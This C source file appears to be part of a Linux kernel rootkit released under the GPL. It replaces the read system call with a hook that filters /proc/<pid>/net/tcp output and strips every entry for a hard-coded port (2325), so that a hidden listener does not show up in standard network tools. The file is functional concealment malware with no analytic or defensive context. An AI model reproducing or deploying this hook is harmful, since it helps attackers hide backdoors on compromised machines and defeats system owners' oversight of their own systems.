/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*-  */
/*
 * main.c
 * Copyright (C) 2019
 *
 * 8008135 is free software: you can redistribute it and/or modify it
 * under the terms of the GNU General Public License as published by the
 * Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * 8008135 is distributed in the hope that it will be useful, but
 * WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
 * See the GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License along
 * with this program.  If not, see <http://www.gnu.org/licenses/>.
 */

/*******************************************************************************/

/**** includes *****************************************************************
*******************************************************************************/
#include "h1d3p0r7.h"

/**** var **********************************************************************
*******************************************************************************/

sys_read_ptr sys_read_orig;

/*******************************************************************************/

/***  FUNCTION  ****************************************************************
*          NAME:  hide port
*   DESCRIPTION:  hides the port 2325
*    PARAMETERS:  -
*       RETURNS:
*******************************************************************************/

asmlinkage long sys_read_fake(unsigned int fd, char __user *buf,
                              size_t count)
{
	long result, bp, diff_in_bytes;
	char *kbuf, *start_line, *end_line, *port_num;
	char *pathname, pbuf[256];
	struct files_struct *current_files;
	struct fdtable *files_table;
	struct path file_path;

	// run real read
	result = (*sys_read_orig)(fd, buf, count);

	if (result <= 0){
		return result;
	}


	current_files = current->files;
	files_table = files_fdtable(current_files);

	file_path = files_table->fd[fd]->f_path;
	pathname = d_path(&file_path, pbuf, 256*sizeof(char));


	if (!strncmp(pathname, "/proc/", 6) && !strcmp(pathname + 10, "/net/tcp")) {

		if (!access_ok(VERIFY_READ, buf, result)){
			return -1;
		}
		if ((kbuf = kmalloc(result, GFP_KERNEL)) == NULL){
			return -1;
		}
		if (copy_from_user(kbuf, buf, result)){
			return -1;
		}


		start_line = strchr(kbuf, ':') - 4;
		diff_in_bytes = (start_line - kbuf) * sizeof(char);

		for (bp = diff_in_bytes; bp < result; bp += diff_in_bytes) {

			start_line = kbuf + bp;
			port_num = strchr(strchr(start_line, ':') + 1, ':') + 1;
			end_line = strchr(start_line, '\n');
			diff_in_bytes = ((end_line - start_line) + 1) * sizeof(char);

			if (!strncmp(port_num, DEFAULT_PORT_HEX, 4)) {

				memmove(start_line, end_line + 1,
						result - bp - diff_in_bytes);

				result -= diff_in_bytes;
			}
		}

		// copy from kernel to userspace
		if (!access_ok(VERIFY_WRITE, buf, result)){
			return EINVAL;
		}
		if (copy_to_user(buf, kbuf, result)){
			return EINVAL;
		}
		kfree(kbuf);
	}
	// return number of bytes read
	return result;
}
